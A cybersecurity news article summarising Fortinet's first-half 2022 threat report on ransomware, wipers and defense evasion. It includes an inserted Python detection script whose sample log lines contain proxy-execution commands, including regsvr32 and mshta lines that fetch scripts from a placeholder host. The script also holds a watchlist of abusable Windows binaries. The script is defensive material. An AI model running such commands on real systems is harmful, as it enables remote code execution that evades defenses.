Ransomware variants almost doubled in six months: Report

News Desk -


Fortinet®, a global provider of comprehensive, integrated, and automated cybersecurity solutions, has released the latest FortiGuard Labs Global Threat Landscape Report.

“Cyber adversaries are advancing their playbooks to thwart defense and scale their criminal affiliate networks,” says Derek Manky, Chief Security Strategist & VP Global Threat Intelligence, FortiGuard Labs. “They are using aggressive execution strategies such as extortion or wiping data as well as focusing on reconnaissance tactics pre-attack to ensure better return on threat investment. To combat advanced and sophisticated attacks, organizations need integrated security solutions that can ingest real-time threat intelligence, detect threat patterns, and correlate massive amounts of data to detect anomalies and automatically initiate a coordinated response across hybrid networks.”

Highlights of the 1H 2022 report follow:

  • The ransomware threat continues to adapt with more variants enabled by Ransomware-as-a-Service (RaaS). 
  • Work-from-anywhere (WFA) endpoints remain targets for cyber adversaries to gain access to corporate networks. Operational technology (OT) and information technology (IT) environments are both attractive targets as cyber adversaries search for opportunities in the growing attack surface and IT/OT convergence.
  • Destructive threat trends continue to evolve, as evidenced by the spread of wiper malware as part of adversary toolkits.
  • Cyber adversaries are embracing more reconnaissance and defense evasion techniques to increase precision and destructive weaponization across the cyber-attack chain.

Ransomware Variant Growth Shows Evolution of Crime Ecosystems: Ransomware remains a major threat, and cyber adversaries continue to invest heavily in new attack techniques. FortiGuard Labs has seen a total of 10,666 ransomware variants in the last six months, up from just 5,400 in the previous six months. In half a year, ransomware variants have increased by nearly 100%. RaaS’s popularity on the dark web fuels a criminal industry that forces organizations to consider ransomware settlements. To combat ransomware, organizations of all sizes and industries must take a proactive approach. It is critical to have real-time visibility, protection, and remediation, as well as zero-trust network access (ZTNA) and advanced endpoint detection and response (EDR).

Exploit Trends Show OT and the Endpoint Are Still Irresistible Targets: As adversaries continue to target the expanding attack surface, the digital convergence of IT and OT, as well as the endpoints that enable WFA, remain key vectors of attack. Many endpoint vulnerability exploits involve unauthorized users gaining access to a system with the goal of lateral movement into corporate networks. For example, a spoofing vulnerability (CVE-2022-26925) and a remote code execution (RCE) vulnerability (CVE-2022-26937) were both prioritized.

In addition, analyzing endpoint vulnerabilities based on volume and detections reveals the relentless path of cyber adversaries attempting to gain access by exploiting both old and new vulnerabilities. Furthermore, when it comes to OT vulnerability trends, the sector was not spared. In-the-wild exploits were discovered on a wide range of devices and platforms, demonstrating the cybersecurity reality of increased IT and OT convergence and adversaries’ disruptive goals. At an early stage of an attack, advanced endpoint technology can help mitigate and effectively remediate infected devices. Furthermore, services such as a digital risk protection service (DRPS) can be used to perform external surface threat assessments, identify and resolve security issues, and provide contextual insights into current and emerging threats.

Destructive Threat Trends Continue With Wipers Widening: Wiper malware trends show a disturbing evolution of more destructive and sophisticated attack techniques, with malicious software that wipes data clean. The conflict in Ukraine fueled a significant increase in disk wiping malware among threat actors targeting critical infrastructure.

In the first six months of 2022, FortiGuard Labs identified at least seven major new wiper variants used in various campaigns against government, military, and private organizations. This figure is significant because it is close to the total number of wiper variants publicly detected since 2012. Furthermore, the wipers were detected in 24 countries besides Ukraine, not just in one. To reduce the impact of wiper attacks, network detection and response (NDR) with self-learning artificial intelligence (AI) can help detect intrusions more effectively. Backups must also be stored off-site and offline.

Defense Evasion Remains Top Attack Tactic Globally: Examining adversarial strategies reveals insights into the evolution of attack techniques and tactics. FortiGuard Labs examined the functionality of detected malware over the last six months to identify the most common approaches. Defense evasion was the most commonly used tactic by malware developers among the top eight endpoint-focused tactics and techniques, and they frequently accomplish it through system binary proxy execution. Concealing malicious intent is one of the most important goals for adversaries, so they try to circumvent defenses by masking their activity and hiding commands behind a legitimately signed, trusted process that carries out the malicious action on their behalf.

Furthermore, process injection was the second most popular technique, in which criminals work to inject code into the address space of another process in order to evade defenses and improve stealth.
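The two defense-evasion behaviours described above, system binary proxy execution and process injection, are visible in endpoint telemetry, which is where a detection team would look for them. The following is an added example, not code from the article or from Fortinet/FortiGuard Labs: it scans constructed Sysmon-style process-creation (Event ID 1) and CreateRemoteThread (Event ID 8) records for trusted Windows binaries being used to proxy execution of content from URLs or user-writable paths, and for remote threads created by executables running from such paths. The `key=value|key=value` record format, field names, heuristics, path patterns and sample log lines are all assumptions made for illustration; the ATT&CK technique references in the comments are to the public framework.

```python
"""Heuristic detection of system binary proxy execution and process injection
in Sysmon-style endpoint telemetry.

Added example for this article; the record format, field names, heuristics
and sample log lines are constructed for illustration and are not Fortinet's
or FortiGuard Labs' detection logic.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows-signed binaries frequently abused to launch other code
# (MITRE ATT&CK T1218, System Binary Proxy Execution). Assumed watchlist.
PROXY_BINARIES = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "msiexec.exe"}

# User-writable locations from which a trusted binary should rarely load a payload
# (assumed patterns; tune to the environment).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads|desktop)\\|\\temp\\|\\programdata\\", re.I)
URL_PATTERN = re.compile(r"https?://", re.I)


@dataclass
class Finding:
    image: str      # basename of the process that triggered the rule
    reason: str     # which heuristic fired
    evidence: str   # the command line or source image that matched


def parse_event(line: str) -> dict:
    """Parse one 'key=value|key=value' record (constructed format)."""
    return dict(field.split("=", 1) for field in line.strip().split("|"))


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_proxy_execution(event: dict) -> Optional[Finding]:
    """Event ID 1 (process creation): trusted binary used to run untrusted content."""
    image = basename(event.get("Image", ""))
    if image not in PROXY_BINARIES:
        return None
    cmd = event.get("CommandLine", "")
    if URL_PATTERN.search(cmd):
        return Finding(image, "remote URL passed to trusted binary", cmd)
    if USER_WRITABLE.search(cmd):
        return Finding(image, "payload loaded from user-writable path", cmd)
    return None


def check_remote_thread(event: dict) -> Optional[Finding]:
    """Event ID 8 (CreateRemoteThread, ATT&CK T1055): injection from a user-writable path."""
    src = event.get("SourceImage", "")
    tgt = basename(event.get("TargetImage", ""))
    if USER_WRITABLE.search(src):
        return Finding(basename(src), f"remote thread from user-writable path into {tgt}", src)
    return None


def scan(lines: List[str]) -> List[Finding]:
    """Run the check matching each record's event type and collect findings."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        event = parse_event(line)
        eid = event.get("EventID")
        finding = None
        if eid == "1":
            finding = check_proxy_execution(event)
        elif eid == "8":
            finding = check_remote_thread(event)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample telemetry: two benign records, four that should fire.
SAMPLE_LOG = [
    "EventID=1|Image=C:\\Windows\\System32\\rundll32.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=rundll32.exe shell32.dll,Control_RunDLL",
    "EventID=1|Image=C:\\Windows\\System32\\rundll32.exe|ParentImage=C:\\Program Files\\Microsoft Office\\WINWORD.EXE"
    "|CommandLine=rundll32.exe C:\\Users\\alice\\AppData\\Local\\Temp\\upd.dll,Start",
    "EventID=1|Image=C:\\Windows\\System32\\regsvr32.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll",
    "EventID=1|Image=C:\\Windows\\System32\\mshta.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=mshta.exe https://example.invalid/p.hta",
    "EventID=1|Image=C:\\Windows\\System32\\notepad.exe|ParentImage=C:\\Windows\\explorer.exe"
    "|CommandLine=notepad.exe C:\\Users\\alice\\Desktop\\notes.txt",
    "EventID=8|SourceImage=C:\\Users\\alice\\Downloads\\invoice.exe|TargetImage=C:\\Windows\\explorer.exe",
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.image}: {f.reason} ({f.evidence})")
```

The point of the heuristics is the one the report makes: the binary itself is trusted and signed, so a rule keyed on the image name alone produces nothing useful. What distinguishes abuse is the context, such as where the loaded content comes from and which process is creating threads in another. In production these checks would sit on top of a parent-process baseline and an allowlist of known-good invocations rather than the bare patterns shown here.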

Organizations will be better positioned to defend against adversaries’ broad toolkits armed with this actionable intelligence. To protect hybrid networks across all edges, integrated, AI and ML-driven cybersecurity platforms with advanced detection and response capabilities powered by actionable threat intelligence are essential.

AI-powered Security Across the Extended Attack Surface 

Organizations can better align defenses to adapt and react to rapidly changing attack techniques when they gain a deeper understanding of adversaries’ goals and tactics through actionable threat intelligence. Threat intelligence is critical for prioritizing patching strategies to improve security in environments. To keep employees and security teams up to date as the threat landscape changes, cybersecurity awareness and training are also essential. To keep up with the volume, sophistication, and rate of today’s cyber threats, organizations require security operations that can operate at machine speed. AI and machine learning-powered prevention, detection, and response strategies based on a cybersecurity mesh architecture enable much tighter integration, increased automation, and a faster, coordinated, and effective response to threats across the extended network.

Report Overview

This latest Global Threat Landscape Report represents FortiGuard Labs’ collective intelligence, drawn from Fortinet’s vast array of sensors that collected billions of threat events observed around the world during the first half of 2022. Similar to how the MITRE ATT&CK framework classifies adversary tactics and techniques, with the first three groupings spanning reconnaissance, resource development, and initial access, the report uses this model to describe how threat actors target vulnerabilities, build malicious infrastructure, and exploit their targets. In addition, the report discusses global and regional perspectives, as well as threat trends affecting IT and OT.
